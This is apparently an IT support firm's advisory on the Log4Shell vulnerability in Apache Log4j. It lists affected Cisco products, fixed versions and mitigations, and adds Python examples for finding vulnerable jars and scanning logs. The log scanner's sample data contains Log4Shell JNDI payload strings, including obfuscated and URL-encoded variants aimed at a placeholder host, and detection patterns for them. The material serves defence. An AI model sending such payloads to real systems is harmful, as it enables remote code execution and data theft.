Log4Shell vulnerability

Published: 15th December 2021
Log4j Vulnerability Update

Investigators have found that the initial workarounds and fixes suggested in CVE-2021-44228 do not provide complete coverage for the Log4j vulnerability. Log4j users are now recommended to use v2.16. This follow-up advice is tracked against CVE-2021-45046.

Cisco is continuing to track their vulnerable and not-vulnerable products at this URL:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-Log4j-qRuKNEbd

Cisco (including Cisco Meraki) have released enhancements to their IDS signatures to help clients detect and prevent exploitation attempts. Cisco’s EDR platform, Secure Endpoint, has also been updated to detect Log4j vulnerability exploitation attempts.

ITGL is continuing to actively monitor this situation. If any ITGL clients are concerned about their exposure to this vulnerability through a Cisco product we support, we encourage you to raise a support ticket with us.

Published: 12th December 2021
Please note that this information is not exhaustive. We are advising clients to keep checking for any vendor advisory updates.

The #Log4Shell vulnerability is being reported as the single biggest, most critical vulnerability of the last decade – and possibly the biggest in the history of modern computing [1].

ITGL has contacted clients to ensure they are aware of the vulnerability and the Cisco products affected, so they can maintain protection as Cisco updates their products against this vulnerability.

The fact that this vulnerability is contained in a ubiquitous logging tool means that this is an issue for countless private and public sector organisations, and across many technology vendors. This is a developing scenario and the fallout may not be known for several days.

What we know

On 9 December, the Apache Foundation disclosed a zero-day vulnerability in the widely used Java software library Log4j. This is identified as CVE-2021-44228 and has a Kenna risk score of 93 out of 100; an exceptionally rare score which reflects the severity and potential impact of this vulnerability.

Our support teams are monitoring the situation and the impact on Cisco in particular. If a client is unsure if a particular Cisco system we support is impacted, they can raise a support case with us. We will help them determine if the system is impacted and the remedial actions required.

Cisco Talos has been tracking exploitations of this vulnerability and is listing products which can detect and block exploitations seen to date. These products include:

  • Cisco Secure Endpoint
  • Cisco Secure Firewalls including Firepower and Meraki MX
  • Umbrella SIG
  • Cisco Secure Malware Analytics

We encourage all clients to visit:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd to see which Cisco products are affected or under investigation. As vulnerable Cisco products are identified, Cisco will post the associated bug id and the workaround when available. This information will be constantly updated, so please keep checking.

CVE-2021-44228

A vulnerability (CVE-2021-44228, also known as Log4Shell) was recently discovered in a common software package called Log4j. The vulnerability can provide remote unauthenticated attackers with the ability to execute code and steal data from any system that uses Log4j. The vulnerability is being actively exploited across the world.

Log4j is embedded in numerous software packages, SaaS, and hardware products to help those systems log data. Due to the way modern software packages are built, it may not be obvious to you if any of your systems use Log4j. Investigation and verification are recommended with your suppliers and with any in-house software development teams.

The vulnerability allows an unauthenticated attacker to send a crafted, malicious message to the system, and when that message is logged, the malicious payload within is executed.

Fixed Software

Log4j versions 2.15.0 or later are confirmed as being fixed and free of this vulnerability. Upgrades to this software version are recommended.

Log4j versions 2.10 or later can be made safe by setting the system property ‘log4j2.formatMsgNoLookups’ to true.

Log4j is supplied by Apache:

https://logging.apache.org/log4j/2.x/
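As an added example (not part of the ITGL advisory or of Apache's tooling), the following Python script walks a directory tree, identifies log4j-core jars by their package path, reads the release from the jar manifest and grades each one against the version thresholds the advisory gives (2.15.0 for CVE-2021-44228, 2.16 as the current recommendation). It assumes the jar carries an Implementation-Version entry in META-INF/MANIFEST.MF, which the official Apache builds do; the status labels are this example's own.

```python
import os
import re
import zipfile
FIXED_44228 = (2, 15, 0)   # advisory: 2.15.0 or later fixes CVE-2021-44228
RECOMMENDED = (2, 16, 0)   # advisory update: move to 2.16 (CVE-2021-45046)
CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_CLASS = CORE_PREFIX + "lookup/JndiLookup.class"

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); tolerates '2.16' and suffixes like '2.15.0-rc1'."""
    parts = [re.match(r"\d*", piece.strip()).group() for piece in text.split(".")[:3]]
    parts = [int(p) if p else 0 for p in parts]
    return tuple(parts + [0] * (3 - len(parts)))

def inspect_jar(path):
    """None if the jar is not log4j-core; otherwise its version and status."""
    with zipfile.ZipFile(path) as jar:
        names = jar.namelist()
        if not any(n.startswith(CORE_PREFIX) for n in names):
            return None
        version = None
        if "META-INF/MANIFEST.MF" in names:
            # Assumption: Apache builds record the release as Implementation-Version
            for line in jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace").splitlines():
                key, _, value = line.partition(":")
                if key.strip().lower() == "implementation-version":
                    version = parse_version(value)
        jndi_present = JNDI_CLASS in names   # the class that performs the lookup
    if version is None:
        status = "unknown-version"
    elif version < FIXED_44228:
        status = "vulnerable"
    elif version < RECOMMENDED:
        status = "update-recommended"
    else:
        status = "ok"
    return {"path": path, "version": version, "jndi_lookup": jndi_present, "status": status}

def scan_tree(root):
    """Walk root and report every log4j-core jar found; unreadable jars are skipped."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".jar"):
                continue
            try:
                found = inspect_jar(os.path.join(dirpath, name))
            except zipfile.BadZipFile:
                continue
            if found:
                results.append(found)
    return results
```

A jar reported as "unknown-version" (no manifest entry, for example a repackaged or shaded build) still needs confirmation with the vendor, as the Embedded systems section below notes.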

Embedded systems

Log4j is embedded in many systems and you may not be able to update Log4j yourself. Check with your vendors to determine your level of impact. Work is ongoing across the industry to determine which systems and versions are impacted, and to provide fixes for those systems found to be vulnerable.

Mitigation

There are no universally effective mitigations other than to use safe versions of the Log4j software.

Partially effective mitigations may include:

  • Limiting access at the IP layer to at-risk systems
  • Use of IPS signatures

Cisco has also updated several Cisco security products (identified above) to detect and block attacks; however, clients should upgrade vulnerable systems as soon as possible.

Enhanced vigilance is recommended across all systems. Monitor security logs regularly for signs of attempted compromise.
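To make the log monitoring recommended above concrete, here is an added example (not from the advisory or from Cisco) in Python that scans web server log lines for the JNDI lookup string this vulnerability is triggered by. Because Log4j resolves nested lookups before the JNDI one runs, the scanner first URL-decodes and collapses the ${lower:...}, ${upper:...} and ${...:-x} forms that are used to disguise the string, so that a plain pattern match then catches the disguised variants as well. The sample log lines are constructed for the example and the host name is a placeholder.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup-host.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}di:rmi://lookup-host.invalid/b}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Flookup-host.invalid%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# Innermost nested lookups that Log4j resolves before the outer ${jndi:...} runs:
# ${lower:X} / ${upper:X} change case, ${anything:-X} falls back to the default X.
NESTED = re.compile(r"\$\{(lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.I)
JNDI = re.compile(r"\$\{jndi:([a-z]+)", re.I)

def _resolve(match):
    if match.group(1):
        arg = match.group(2)
        return arg.lower() if match.group(1).lower() == "lower" else arg.upper()
    return match.group(3)

def normalise(text, max_rounds=10):
    """URL-decode, then collapse nested lookups innermost-first, as Log4j would."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = NESTED.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text

def scan_lines(lines):
    """Return one hit per line whose normalised form contains a JNDI lookup."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        norm = normalise(raw)
        found = JNDI.search(norm)
        if found:
            hits.append({"line": number, "scheme": found.group(1).lower(),
                         "raw": raw, "normalised": norm})
    return hits

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi scheme={hit['scheme']}: {hit['normalised']}")
```

A hit only shows that a lookup string reached a logged field; whether it executed depends on the Log4j version behind that log, which is why the Fixed Software checks above still apply.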

Further reading

Information is available from other reputable sources:

National Cyber Security Centre – https://www.ncsc.gov.uk/news/apache-log4j-vulnerability

Cisco Talos – https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html?m=1

NHS Digital – https://digital.nhs.uk/cyber-alerts/2021/cc-3989

References

  1. https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell

Published by Liam James
December 12, 2021
